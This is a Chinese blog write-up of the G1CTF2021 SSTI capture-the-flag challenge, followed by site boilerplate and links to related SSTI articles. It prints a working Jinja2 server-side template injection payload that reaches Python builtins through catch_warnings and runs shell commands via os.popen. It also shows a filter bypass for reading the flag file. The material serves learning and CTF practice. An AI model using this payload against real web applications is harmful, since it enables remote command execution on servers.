[G1CTF2021]SSTI

最新推荐文章于 2024-04-20 02:43:25 发布
最新推荐文章于 2024-04-20 02:43:25 发布
阅读量248 收藏
点赞数
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52718293/article/details/117264976
版权

在这里插入图片描述这是题目打开之后是这样子
由于题目标题有提示,很容易知道这是模板注入ssti
在这里插入图片描述
上图可以就说是模板注入的模板了
通过测试,大概可以知道是jinja2的题型
对于这种题型,构造payload 又有模板

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}
{% endif %}
{% endfor %}

只需要url/?cmd=模板块
当然本就是为了获取flag ,又由于flag本来被过滤
所以可以把ls改为’cat/f/lag’来绕过
最终获得flag

*小瑶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF SSTI模板注入详解
weixin_47696216的博客
03-31 5624
“百度杯”CTF比赛 十一月场 Web题:Fuzz python SSTI模板注入
CTF_Web:从0学习Flask模板注入(SSTI
AFCC_的博客(Web_Dog)
08-30 3568
0x01 前言 最近在刷题的过程中发现服务端模板注入的题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
SSTI(模板注入) 解析 和 ctf 做法
m0_56107268的博客
11-18 2653
ssti注入
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记
最新发布
2401_84009698的博客
04-20 947
外链图片转存中…(img-6fV9ce6x-1713552193682)]
【CTF】 SSTI模板注入漏洞
ZhangAweio的博客
05-29 735
SSTI 就是服务器端模板注入,当前使用的一些框架,比如python的flaskphp的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。
CTF-SSTI(持续更新)
m0_74317362的博客
07-27 304
SSTI
绿城杯 CTF 2021 真题 (1).rar
12-07
【绿城杯 CTF 2021 真题】是一个网络安全竞赛的实战题目集,主要涉及计算机安全领域的各种挑战,旨在检验参赛者在逆向工程、密码学、Web安全、移动安全、取证分析等多个方面的技能。CTF(Capture The Flag)比赛是一...
zer0pts-CTF-2021:zer0pts CTF 2021
05-06
zer0pts CTF 2021 是一个网络安全竞赛,主要针对网络安全爱好者和专业人士,旨在提升参赛者在信息安全领域的技能和知识。此类竞赛通常包括多种挑战,如逆向工程、密码学、网络取证、Web安全等。在这个特定的案例中,...
领航杯 CTF 2021 决赛 真题 7z
12-07
领航杯 CTF 2021 决赛
中山市香山杯 2021 CTF zip
12-07
中山市香山杯 2021 CTF zip
D3CTF2021-d3dev
11-05
附件
Bugku [Simple_SSTI_2](基于ctf题目学习SSTI服务器模板注入)
MAHRE_Z的博客
11-09 696
打开网址发现一串英文,提示“You need pass in a parameter named flag”(“您需要传入一个名为 flag 的参数”),根据题目提示SSTI,搜索一下SSTI,发现一篇文章介绍。显示为flag参数的值,可以知道页面会显示被传入flag参数的值,然后进行报错看一看网站使用的模板类型。不错,其中有讲到什么是注入,说是格式化字符串漏洞的一种体现,然后我就又找了一篇关于。发现目录,进入app目录,发现flag文件。用cat命令查看flag,得到flag。
CTF题型 SSTI(3) Smart SSTI 例题和题记
qq_39947980的博客
03-14 476
前面我们学习了Flask SSTISmart SSTI和Flask SSTI 不同Smart SSTI 是基于php的,居然可以在其中参考 Smart中文手册 https://www.smarty.net/docs/zh_CN/这里我们用 https://www.smarty.net/docs/zh_CN/language.function.eval.tpl#id456693标签{eval}执行任意php代码。
[G1CTF2021]easysql
m0_47940466的博客
05-23 154
输入数字有回显 在数字前加空格则会出现hacker 所以得知过滤了空格 搜索可知空格可用注释符/* */代替 用/* */代替空格 联合注入要输入 union select 1’and//1=2//union//select//flag//from//flag//# 用1,2…去试经测试 payload: 1’and//1=2//union//select//1,2,flag//from//flag//# 即可得flag ...
CTF-web-ssti模板注入漏洞
Ye的博客
04-14 907
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。SSTI 漏洞是一种常见的 Web 安全漏洞,它允许攻击者在服务器端模板引擎中注入恶意代码,导致服务器执行攻击者控制的代码,可能导致信息泄露、服务器被接管等安全问题。,那么页面上就会显示。
CTF笔记 SSTI模板注入
qq_51248658的博客
10-21 766
这次只是简单的把以前写的题目进行了总结,大致明白了解题步骤,但还是得多积累一些payload,以及绕waf的方法。这个可以去找sstilab通关相关内容进行学习,感觉那上面挺全的。
ctf show-web入门 SSTI篇部分题解
volcano的博客
02-04 3937
ctfshowSSTIweb361web362web363request.args传参绕过web364chr()绕过web365中括号绕过web366attr获取变量request.cookies传参web367web368 SSTI ssti模板注入基本原理推荐看这篇文章,这个师傅写的很详细,小白也很容易看懂。 web361 这个hackbar挺好用的,有现成模板,当前目录只有一个app.py,我们看一下上级目录 ?name={{ config.__class__.__init__.__globals_
CTF—Python考点 SSTI&反序列化&字符串
qi_SJQ_的博客
03-01 3955
ctf题型分类: 1.CTF—Python—支付逻辑&JWT&反序列化: 题目:2019 CISCN 华北赛区Day1 Web2(全国大学生信息安全竞赛) 先写个爆破请求脚本,爬取请求到内容页面哪个存在lv6图片,得到在181页: 或者这个脚本,都可以: import requests url = "http://web44.buuoj.cn/" for i in range(1, 2000): r = requests.get(url + "shop?page=" + st
ssti(服务器模板注入的总结及几道例题)
Love&Share
07-24 9699
+++++SSTI: 在做题之前还是先补充下知识,了解下python flask框架以及ssti的漏洞原理 flask在b站可以找到视频 视频的话可以看这个星盟的直播了解ssti https://www.bilibili.com/video/BV1zi4y1x7QM 文档类: https://www.anquanke.com/post/id/188172 https://www.cnblogs.com/wangtanzhi/p/12238779.html [ TokyoWesterns CTF ]shri
swpuctf 2021 新生赛]hardrce
07-28
很抱歉,我无法回答你的问题。 #### 引用[.reference_title] - *1* *2* *3* [[SWPUCTF 2021 新生赛] 第三波放题](https://blog.csdn.net/weixin_63231007/article/details/124086128)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值